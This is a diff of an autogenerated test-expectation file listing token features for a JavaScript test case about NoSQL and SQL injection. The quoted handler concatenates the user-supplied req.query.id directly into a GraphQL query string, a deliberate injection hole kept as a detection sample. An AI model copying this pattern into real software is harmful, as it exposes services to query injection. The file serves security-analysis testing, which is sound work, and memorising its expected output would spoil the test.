autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:38:73:40 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:43:73:45 | res | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:43:73:45 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:43:73:45 | res | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:43:73:45 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:43:73:45 | res | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:10 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:10 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:10 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:10 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:10 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id = req.query.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id = req.query.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id = req.query.id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id = req.query.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:9:74:25 | id = req.query.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:16 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:16 | req | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:16 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:22 | req.query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:22 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:22 | req.query | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:22 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:22 | req.query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:25 | req.query.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:25 | req.query.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:25 | req.query.id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:25 | req.query.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:14:74:25 | req.query.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:18:74:22 | query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:18:74:22 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:18:74:22 | query | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:18:74:22 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:18:74:22 | query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:24:74:25 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:24:74:25 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:24:74:25 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:24:74:25 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:74:24:74:25 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:14 | result | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:14 | result | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:14 | result | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:14 | result | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:14 | result | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:71 | result ... , root) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:71 | result ... , root) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:71 | result ... , root) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:71 | result ... , root) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:9:75:71 | result ... , root) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:18:75:71 | await n ... , root) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:18:75:71 | await n ... , root) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:18:75:71 | await n ... , root) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:18:75:71 | await n ... , root) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:18:75:71 | await n ... , root) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:36 | nativeGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:36 | nativeGraphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:36 | nativeGraphql | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:36 | nativeGraphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:36 | nativeGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | exceptional return of nativeG ... , root) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | exceptional return of nativeG ... , root) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | exceptional return of nativeG ... , root) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | exceptional return of nativeG ... , root) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | exceptional return of nativeG ... , root) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | nativeG ... , root) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | nativeG ... , root) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | nativeG ... , root) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | nativeG ... , root) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:24:75:71 | nativeG ... , root) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:38:75:43 | schema | CalleeFlexibleAccessPath | nativeGraphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:38:75:43 | schema | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:38:75:43 | schema | calleeImports | graphql | @@ -420,6 +2675,17 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:38:75:43 | schema | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:38:75:43 | schema | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:38:75:43 | schema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:52 | "{ foo" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:52 | "{ foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:52 | "{ foo" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:52 | "{ foo" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:52 | "{ foo" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:52 | "{ foo" | stringConcatenatedWith | -endpoint- id + ' }' | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:57 | "{ foo" + id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:57 | "{ foo" + id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:57 | "{ foo" + id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:57 | "{ foo" + id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:57 | "{ foo" + id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:64 | "{ foo" + id + " }" | CalleeFlexibleAccessPath | nativeGraphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:64 | "{ foo" + id + " }" | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:64 | "{ foo" + id + " }" | calleeImports | graphql | @@ -428,6 +2694,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:64 | "{ foo" + id + " }" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:64 | "{ foo" + id + " }" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:46:75:64 | "{ foo" + id + " }" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:56:75:57 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:56:75:57 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:56:75:57 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:56:75:57 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:56:75:57 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:56:75:57 | id | stringConcatenatedWith | '{ foo' -endpoint- ' }' | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:61:75:64 | " }" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:61:75:64 | " }" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:61:75:64 | " }" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:61:75:64 | " }" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:61:75:64 | " }" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:61:75:64 | " }" | stringConcatenatedWith | '{ foo' + id -endpoint- | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:67:75:70 | root | CalleeFlexibleAccessPath | nativeGraphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:67:75:70 | root | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:67:75:70 | root | calleeImports | graphql | @@ -436,6 +2714,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:67:75:70 | root | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:67:75:70 | root | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:75:67:75:70 | root | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:77:7 | fetch | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:77:7 | fetch | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:77:7 | fetch | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:77:7 | fetch | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:77:7 | fetch | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | exceptional return of fetch(" ... })\\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | exceptional return of fetch(" ... })\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | exceptional return of fetch(" ... })\\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | exceptional return of fetch(" ... })\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | exceptional return of fetch(" ... })\\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | fetch(" ... })\\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | fetch(" ... })\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | fetch(" ... })\\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | fetch(" ... })\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:3:92:4 | fetch(" ... })\\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:9:77:47 | "https: ... raphql" | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:9:77:47 | "https: ... raphql" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:9:77:47 | "https: ... raphql" | contextFunctionInterfaces | hello() | @@ -450,6 +2743,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:50:92:3 | {\\n m ... })\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:50:92:3 | {\\n m ... })\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:77:50:92:3 | {\\n m ... })\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:10 | method | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:10 | method | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:10 | method | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:10 | method | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:10 | method | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | contextFunctionInterfaces | hello() | 